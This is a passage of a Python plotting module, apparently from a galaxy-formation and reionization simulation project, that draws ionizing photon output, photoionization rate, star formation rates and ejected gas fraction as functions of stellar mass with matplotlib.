w = np.where((master_N_reionmod_stellar[model_number][snapshot_idx] < 4))[0] # Mask bins containing fewer than 4 galaxies so they are not plotted.
master_mean_reionmod_stellar[model_number][snapshot_idx][w] = np.nan
master_mean_reionmod_gnedin_stellar[model_number][snapshot_idx][w] = np.nan
if (model_number == 0):
print(master_mean_reionmod_stellar[model_number][snapshot_idx])
ax2[count_x, count%2].plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_reionmod_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[model_number],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
if (model_number == 0):
ax2[count_x, count%2].plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_reionmod_gnedin_stellar[model_number][snapshot_idx],
color = 'k',
ls = '--',
rasterized = True, label = "Gnedin",
lw = PlotScripts.global_linewidth)
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
## Stellar Mass plots ##
if paper_plots == 0:
adjust_stellarmass_plot(ax1)
else:
adjust_paper_plots(ax, model_tags)
print(z_labels)
adjust_redshift_panels(ax2, z_labels)
leg = ax[0,0].legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
leg = ax2[0,0].legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
plt.tight_layout()
plt.subplots_adjust(wspace = 0.0, hspace = 0.0)
## Output ##
outputFile = "{0}{1}".format(output_tag, output_format)
fig.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig)
outputFile2 = "{0}_redshiftpanels{1}".format(output_tag, output_format)
fig2.savefig(outputFile2, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile2))
plt.close(fig2)
##
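# The routines in this file repeatedly mask under-populated bins by setting
# their mean to np.nan so matplotlib simply skips those points. A minimal,
# self-contained sketch of that masking step (hypothetical helper name, not
# part of this module):

```python
import numpy as np

def mask_sparse_bins(mean_vals, counts, min_count=4):
    """Return a float copy of mean_vals with bins holding fewer than
    min_count galaxies set to NaN; matplotlib does not draw NaN points."""
    masked = np.array(mean_vals, dtype=float)
    masked[np.asarray(counts) < min_count] = np.nan
    return masked
```
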
def plot_nion_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_Ngamma_galaxy, std_Ngamma_galaxy, N_Ngamma_galaxy,
model_tags, paper_plots, output_tag):
"""
Plots the number of ionizing photons emitted (not necessarily escaped) as a
function of galaxy stellar mass.
Parallel compatible.
Accepts 3D arrays of the ionizing photon output binned into stellar mass bins to plot multiple models.
Mass units are log(Msun)
Parameters
----------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model.
simulation_norm : array with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z = 1.6ish).
4 : Britton's Simulation
5 : Kali
mean_Ngamma_galaxy, std_Ngamma_galaxy, N_Ngamma_galaxy : Nested
3-dimensional array, mean_Ngamma_galaxy[model_number0][snapshot0] = [bin0_meanNgamma, ..., binN_meanNgamma], with length equal to the number of models.
Mean/Standard deviation for Ngamma in each stellar mass bin, for each
[model_number] and [snapshot_number]. N_Ngamma_galaxy is the number
of galaxies placed into each mass bin.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
paper_plots: Integer.
Flag to denote whether we should plot a full, 4 panel plot for the
RSAGE paper.
output_tag : string
Name of the file that will be generated.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Mass units are log(Msun).
Ngamma units are 1.0e50 photons/s.
"""
def adjust_stellarmass_plot(ax):
#ax.axhline(0.20, 0, 100, color ='k', linewidth = PlotScripts.global_linewidth, linestyle = '-.')
#ax.text(7.8, 0.22, r"$f_\mathrm{esc, base}$", color = 'k',
# size = PlotScripts.global_fontsize)
ax.set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\mathbf{\log_{10}\langle f_{esc} N_\gamma\rangle_{M_*}}$',
size = PlotScripts.global_labelsize)
ax.set_xlim([6.8, 10])
#ax.set_ylim([0.05, 0.45])
#ax.axhline(0.35, 0, 100, color ='k', linewidth = PlotScripts.global_linewidth, linestyle = '-.')
#ax.text(9.1, 0.37, r"$f_\mathrm{esc} = 0.35$", color = 'k',
# size = PlotScripts.global_fontsize)
ax.xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
#ax.yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax.tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax.tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax.tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax.spines[axis].set_linewidth(PlotScripts.global_axiswidth)
tick_locs = np.arange(6.0, 11.0)
ax.set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(0.0, 0.80, 0.10)
#ax.set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
'''
labels = ax.yaxis.get_ticklabels()
locs = ax.yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
'''
leg = ax.legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
def adjust_paper_plots(ax, z_tags):
ax[1,0].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[1,1].set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax[0,0].set_ylabel(r'$\mathbf{\Sigma log_{10}\langle f_{esc} N_\gamma\rangle_{M_*}}$',
size = PlotScripts.global_labelsize - 10)
ax[1,0].set_ylabel(r'$\mathbf{\Sigma log_{10}\langle f_{esc} N_\gamma\rangle_{M_*}}$',
size = PlotScripts.global_labelsize - 10)
ax_x = [0, 0, 1, 1]
ax_y = [0, 1, 0, 1]
for count, (x, y) in enumerate(zip(ax_x, ax_y)):
ax[x,y].set_xlim([4.8, 10.4])
ax[x,y].set_ylim([47, 55])
#ax[x,y].yaxis.set_major_locator(mtick.MultipleLocator(0.1))
ax[x,y].xaxis.set_major_locator(mtick.MultipleLocator(1.0))
#ax[x,y].yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax[x,y].xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax[x,y].tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax[x,y].tick_params(which = 'major', length = PlotScripts.global_ticklength)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax[x,y].spines[axis].set_linewidth(PlotScripts.global_axiswidth)
print(z_tags[count])
label = r"$\mathbf{z = " + \
str(int(round(float(z_tags[count])))) +\
"}$"
ax[x,y].text(0.7, 0.8, label, transform = ax[x,y].transAxes, fontsize = PlotScripts.global_fontsize - delta_fontsize)
tick_locs = np.arange(4.0, 11.0)
ax[1,0].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
ax[1,1].set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(0.0, 0.80, 0.10)
#ax[0,0].set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
#ax[1,0].set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
print("x")
labels = ax[1,0].xaxis.get_ticklabels()
locs = ax[1,0].xaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
print("y")
labels = ax[1,0].yaxis.get_ticklabels()
locs = ax[1,0].yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
print("Plotting Ngamma*fesc as a function of stellar mass.")
## Array initialization ##
master_mean_Ngamma_stellar, master_std_Ngamma_stellar, master_N_Ngamma_stellar, master_bin_middle_stellar = \
collect_across_tasks(mean_Ngamma_galaxy, std_Ngamma_galaxy, N_Ngamma_galaxy,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
if rank == 0:
if paper_plots == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
else:
fig, ax = plt.subplots(nrows=2, ncols=2, sharex='col', sharey='row', figsize=(16, 6))
delta_fontsize = 0
caps = 5
ewidth = 1.5
z_tags = np.zeros_like(model_tags, dtype=np.float32)
for model_number in range(0, len(SnapList)):
count_x = 0
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
plot_count = 0
for count, snapshot_idx in enumerate(range(0, len(SnapList[model_number]))):
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
if count == 2:
count_x += 1
label = model_tags[model_number]
z_tags[count] = float(AllVars.SnapZ[SnapList[model_number][snapshot_idx]])
## Plots as a function of stellar mass ##
w = np.where((master_N_Ngamma_stellar[model_number][snapshot_idx] < 4))[0] # Mask bins containing fewer than 4 galaxies so they are not plotted.
master_mean_Ngamma_stellar[model_number][snapshot_idx][w] = np.nan
if paper_plots == 0:
ax1.plot(master_bin_middle_stellar[model_number][snapshot_idx],
np.log10(master_mean_Ngamma_stellar[model_number][snapshot_idx]*1.0e50),
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
else:
ax[count_x, count%2].plot(master_bin_middle_stellar[model_number][snapshot_idx],
np.log10(master_mean_Ngamma_stellar[model_number][snapshot_idx]*1.0e50),
color = PlotScripts.colors[model_number],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
## Stellar Mass plots ##
if paper_plots == 0:
adjust_stellarmass_plot(ax1)
else:
adjust_paper_plots(ax, z_tags)
leg = ax[0,0].legend(loc="upper left", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
plt.tight_layout()
plt.subplots_adjust(wspace = 0.0, hspace = 0.0)
## Output ##
outputFile = "./{0}{1}".format(output_tag, output_format)
fig.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig)
##
def plot_photo_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_photo_galaxy, std_photo_galaxy, N_photo_galaxy,
model_tags, paper_plots, output_tag):
"""
Plots the photoionization rate as a function of galaxy stellar mass.
Parallel compatible.
Accepts 3D arrays of the photoionization rate binned into stellar mass bins to plot multiple models.
Mass units are log(Msun)
Parameters
----------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model.
simulation_norm : array with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z = 1.6ish).
4 : Britton's Simulation
5 : Kali
mean_photo_galaxy, std_photo_galaxy, N_photo_galaxy : Nested
3-dimensional array, mean_photo_galaxy[model_number0][snapshot0] =
[bin0_meanphoto, ..., binN_meanphoto], with length equal to the number of models.
Mean/Standard deviation for the photoionization rate in each stellar mass
bin, for each [model_number] and [snapshot_number]. N_photo_galaxy is
the number of galaxies placed into each mass bin.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
paper_plots: Integer.
Flag to denote whether we should plot a full, 4 panel plot for the
RSAGE paper.
output_tag : string
Name of the file that will be generated.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Mass units are log(Msun).
Photoionization rate units are s^-1.
"""
def adjust_stellarmass_plot(ax):
ax.set_xlabel(r'$\mathbf{log_{10} \: M_{*} \:[M_{\odot}]}$',
size = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\mathbf{log_{10} \: \Gamma \: [s^{-1}]}$',
size = PlotScripts.global_labelsize)
ax.set_xlim([4.8, 10])
#ax.set_ylim([0.05, 0.45])
ax.xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
#ax.yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax.tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax.tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax.tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax.spines[axis].set_linewidth(PlotScripts.global_axiswidth)
#tick_locs = np.arange(4.0, 11.0)
#ax.set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(0.0, 0.80, 0.10)
#ax.set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
'''
labels = ax.yaxis.get_ticklabels()
locs = ax.yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
'''
leg = ax.legend(loc="lower right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
print("Plotting photoionization rate as a function of stellar mass.")
## Array initialization ##
master_mean_photo_stellar, master_std_photo_stellar, master_N_photo_stellar, master_bin_middle_stellar = \
collect_across_tasks(mean_photo_galaxy, std_photo_galaxy, N_photo_galaxy,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
if rank == 0:
if paper_plots == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
else:
pass
for model_number in range(0, len(SnapList)):
count_x = 0
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
plot_count = 0
for count, snapshot_idx in enumerate(range(0, len(SnapList[model_number]))):
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
if (model_number == 0):
label = r"$\mathbf{z = " + \
str(int(round(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]))) +\
"}$"
else:
label = ""
## Plots as a function of stellar mass ##
w = np.where((master_N_photo_stellar[model_number][snapshot_idx] < 4))[0] # Mask bins containing fewer than 4 galaxies so they are not plotted.
master_mean_photo_stellar[model_number][snapshot_idx][w] = np.nan
if paper_plots == 0:
ax1.plot(master_bin_middle_stellar[model_number][snapshot_idx],
np.log10(master_mean_photo_stellar[model_number][snapshot_idx]),
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
else:
pass
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
for model_number in range(0, len(SnapList)):
ax1.plot(np.nan, np.nan, color = 'k',
label = model_tags[model_number],
lw = PlotScripts.global_linewidth,
ls = PlotScripts.linestyles[model_number])
## Stellar Mass plots ##
if paper_plots == 0:
adjust_stellarmass_plot(ax1)
else:
pass
## Output ##
outputFile = "./{0}{1}".format(output_tag, output_format)
fig.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig)
##
##
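# The redshift annotations in these routines are all built with the same
# inline string concatenation (see the r"$\mathbf{z = ...}$" blocks above).
# A small sketch of that formatting step as a helper (hypothetical name,
# same output as the inline code):

```python
def make_z_label(z):
    """Format a redshift as the bold LaTeX label used on these plots,
    rounding to the nearest integer (e.g. 6.97 -> r"$\mathbf{z = 7}$")."""
    return r"$\mathbf{z = " + str(int(round(float(z)))) + "}$"
```
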
def plot_sfr_galaxy(SnapList, PlotSnapList, simulation_norm,
mean_galaxy_sfr, std_galaxy_sfr,
mean_galaxy_ssfr, std_galaxy_ssfr,
N_galaxy, model_tags, output_tag):
"""
Plots the star formation rate (SFR) and specific star formation rate (sSFR) as a function of stellar mass.
Parallel compatible.
Accepts 3D arrays of the SFR and sSFR binned into Stellar Mass bins.
Mass units log(Msun).
Parameters
----------
SnapList : Nested array, SnapList[model_number0] = [snapshot0_model0, ..., snapshotN_model0], with length equal to the number of models.
Snapshots for each model.
simulation_norm : array with length equal to the number of models.
Denotes which simulation each model uses.
0 : MySim
1 : Mini-Millennium
2 : Tiamat (down to z = 5)
3 : Extended Tiamat (down to z = 1.6ish).
4 : Britton's Simulation
5 : Kali
mean_galaxy_sfr, std_galaxy_sfr, mean_galaxy_ssfr, std_galaxy_ssfr : Nested 3-dimensional arrays,
mean_galaxy_ssfr[model_number0][snapshot0] = [bin0_meanssfr, ..., binN_meanssfr],
with length equal to the number of models.
Mean/Standard deviation for the SFR/sSFR in each stellar mass bin, for each [model_number] and [snapshot_number].
N_galaxy is the number of galaxies placed into each mass bin.
model_tags : array of strings with length equal to the number of models.
Strings that contain the tag for each model. Will be placed on the plot.
output_tag : string
Name of the file that will be generated.
Returns
-------
No returns.
Generates and saves the plot (named via output_tag).
Units
-----
Mass units are log(Msun); SFR units are Msun/yr and sSFR units are yr^-1.
"""
def adjust_sfr_plot(ax):
ax.set_xlabel(r'$\log_{10}\ M_*\ [M_{\odot}]$',
size = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\mathbf{\langle \mathrm{SFR}\rangle_{M_*}\:[M_\odot\mathrm{yr}^{-1}]}$',
size = PlotScripts.global_labelsize)
ax.set_xlim([4.8, 10])
ax.set_ylim([-3, 2])
ax.xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax.yaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax.tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax.tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax.tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax.spines[axis].set_linewidth(PlotScripts.global_axiswidth)
tick_locs = np.arange(6.0, 11.0)
ax.set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(0.0, 0.80, 0.10)
#ax.set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
labels = ax.yaxis.get_ticklabels()
locs = ax.yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
leg = ax.legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
def adjust_ssfr_plot(ax):
ax.set_xlabel(r'$\log_{10}\ M_*\ [M_{\odot}]$',
size = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\mathbf{\langle\mathrm{sSFR}\rangle_{M_*}\:[\mathrm{yr^{-1}}]}$',
size = PlotScripts.global_labelsize)
ax.set_xlim([4.8, 10])
ax.set_ylim([-9, -4])
ax.xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax.yaxis.set_minor_locator(mtick.MultipleLocator(0.1))
ax.tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax.tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax.tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax.spines[axis].set_linewidth(PlotScripts.global_axiswidth)
tick_locs = np.arange(6.0, 11.0)
ax.set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(0.0, 0.80, 0.10)
#ax.set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
labels = ax.yaxis.get_ticklabels()
locs = ax.yaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
leg = ax.legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
print("Plotting sSFR as a function of stellar mass.")
## Array initialization ##
master_mean_sfr_stellar, master_std_sfr_stellar, master_N_sfr_stellar, master_bin_middle_stellar = \
collect_across_tasks(mean_galaxy_sfr, std_galaxy_sfr, N_galaxy,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
master_mean_ssfr_stellar, master_std_ssfr_stellar, master_N_ssfr_stellar, master_bin_middle_stellar = \
collect_across_tasks(mean_galaxy_ssfr, std_galaxy_ssfr, N_galaxy,
SnapList, PlotSnapList, True, m_gal_low, m_gal_high)
if rank == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
for model_number in range(0, len(SnapList)):
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
plot_count = 0
for snapshot_idx in range(0, len(SnapList[model_number])):
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
if (model_number == 0):
label = r"$\mathbf{z = " + \
str(int(round(AllVars.SnapZ[SnapList[model_number][snapshot_idx]]))) +\
"}$"
else:
label = ""
## Plots as a function of stellar mass ##
ax1.plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_sfr_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
ax2.plot(master_bin_middle_stellar[model_number][snapshot_idx],
master_mean_ssfr_stellar[model_number][snapshot_idx],
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
#for model_number in range(0, len(SnapList)): # Just plot some garbage to get the legend labels correct.
#ax1.plot(np.nan, np.nan, color = 'k', linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = model_tags[model_number], linewidth = PlotScripts.global_linewidth)
#ax3.plot(np.nan, np.nan, color = 'k', linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = model_tags[model_number], linewidth = PlotScripts.global_linewidth)
## Stellar Mass plots ##
adjust_sfr_plot(ax1)
adjust_ssfr_plot(ax2)
## Output ##
outputFile = "./{0}SFR{1}".format(output_tag, output_format)
fig.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
outputFile = "./{0}sSFR{1}".format(output_tag, output_format)
fig2.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig)
plt.close(fig2)
##
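# Each plotting routine first calls collect_across_tasks to reduce the
# per-task binned statistics onto rank 0. The reduction of binned means can
# be sketched as a count-weighted average (illustrative only; the real
# collect_across_tasks is defined elsewhere and also handles the standard
# deviations and bin centres):

```python
import numpy as np

def combine_binned_means(means, counts):
    """Count-weighted combination of per-task bin means.

    means, counts : arrays of shape (n_tasks, n_bins).
    Returns (combined_mean, total_count); bins with zero total count
    come back as NaN.
    """
    means = np.asarray(means, dtype=float)
    counts = np.asarray(counts, dtype=float)
    total = counts.sum(axis=0)
    weighted = np.nansum(means * counts, axis=0)  # NaN means contribute nothing.
    combined = np.where(total > 0, weighted / np.maximum(total, 1.0), np.nan)
    return combined, total
```
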
##
def plot_fej_Ngamma(SnapList, PlotSnapList, simulation_norm,
mean_Ngamma_fej, std_Ngamma_fej,
N_fej, model_tags, output_tag):
"""
Plots the mean ionizing photon output as a function of the ejected gas fraction, f_ej.
Parallel compatible. Generates and saves the plot (named via output_tag).
"""
def adjust_plot(ax):
ax.set_xlabel(r'$\mathbf{f_\mathrm{ej}}$',
size = PlotScripts.global_fontsize)
ax.set_ylabel(r'$\mathbf{\log_{10}\langle N_\gamma\rangle_{f_{ej}}}$',
size = PlotScripts.global_labelsize)
ax.set_xlim([0.0, 1.0])
#ax.set_ylim([0.05, 0.45])
#ax.axhline(0.35, 0, 100, color ='k', linewidth = PlotScripts.global_linewidth, linestyle = '-.')
#ax.text(9.1, 0.37, r"$f_\mathrm{esc} = 0.35$", color = 'k',
# size = PlotScripts.global_fontsize)
ax.xaxis.set_minor_locator(mtick.MultipleLocator(0.10))
#ax.yaxis.set_minor_locator(mtick.MultipleLocator(0.05))
ax.tick_params(which = 'both', direction='in', width =
PlotScripts.global_tickwidth)
ax.tick_params(which = 'major', length = PlotScripts.global_ticklength)
ax.tick_params(which = 'minor', length = PlotScripts.global_ticklength-2)
for axis in ['top','bottom','left','right']: # Adjust axis thickness.
ax.spines[axis].set_linewidth(PlotScripts.global_axiswidth)
#tick_locs = np.arange(6.0, 11.0)
#ax.set_xticklabels([r"$\mathbf{%d}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
#tick_locs = np.arange(0.0, 0.80, 0.10)
#ax.set_yticklabels([r"$\mathbf{%.2f}$" % x for x in tick_locs],
# fontsize = PlotScripts.global_fontsize)
labels = ax.xaxis.get_ticklabels()
locs = ax.xaxis.get_ticklocs()
for label, loc in zip(labels, locs):
print("{0} {1}".format(label, loc))
leg = ax.legend(loc="upper right", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
## Array initialization ##
master_mean_Ngamma_fej, master_std_Ngamma_fej, master_N_Ngamma_fej, master_bin_middle_fej = \
collect_across_tasks(mean_Ngamma_fej, std_Ngamma_fej, N_fej,
SnapList, PlotSnapList, True, fej_low, fej_high,
fej_bin_width)
if rank == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax2 = ax1.twinx()
for model_number in range(0, len(SnapList)):
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
plot_count = 0
for snapshot_idx in range(0, len(SnapList[model_number])):
if (SnapList[model_number][snapshot_idx] == PlotSnapList[model_number][plot_count]):
label = model_tags[model_number]
w = np.where((master_N_Ngamma_fej[model_number][snapshot_idx] < 4))[0] # Mask bins containing fewer than 4 galaxies so they are not plotted.
master_mean_Ngamma_fej[model_number][snapshot_idx][w] = np.nan
ax1.plot(master_bin_middle_fej[model_number][snapshot_idx],
np.log10(master_mean_Ngamma_fej[model_number][snapshot_idx]*1.0e50),
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
#ax1.plot(master_bin_middle_fej[model_number][snapshot_idx],
# np.log10(master_mean_Ngamma_fej[model_number][snapshot_idx]*1.0e50
# * master_N_Ngamma_fej[model_number][snapshot_idx]),
# color = PlotScripts.colors[plot_count],
# ls = PlotScripts.linestyles[model_number],
# rasterized = True, label = label,
#lw = PlotScripts.global_linewidth)
'''
ax2.plot(master_bin_middle_fej[model_number][snapshot_idx],
np.log10(master_N_Ngamma_fej[model_number][snapshot_idx]),
color = PlotScripts.colors[plot_count],
ls = PlotScripts.linestyles[model_number],
rasterized = True, label = label,
lw = PlotScripts.global_linewidth)
'''
plot_count += 1
if (plot_count == len(PlotSnapList[model_number])):
break
adjust_plot(ax1)
leg = ax1.legend(loc="upper center", numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize('medium')
plt.tight_layout()
## Output ##
outputFile = "./{0}{1}".format(output_tag, output_format)
fig.savefig(outputFile, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile))
plt.close(fig)
def plot_ejectedfraction(SnapList, PlotSnapList, simulation_norm, mean_mvir_ejected,
std_mvir_ejected, N_ejected, mean_ejected_z,
std_ejected_z, N_z, model_tags, output_tag):
'''
Plots the ejected fraction as a function of the halo mass.
Parallel compatible.
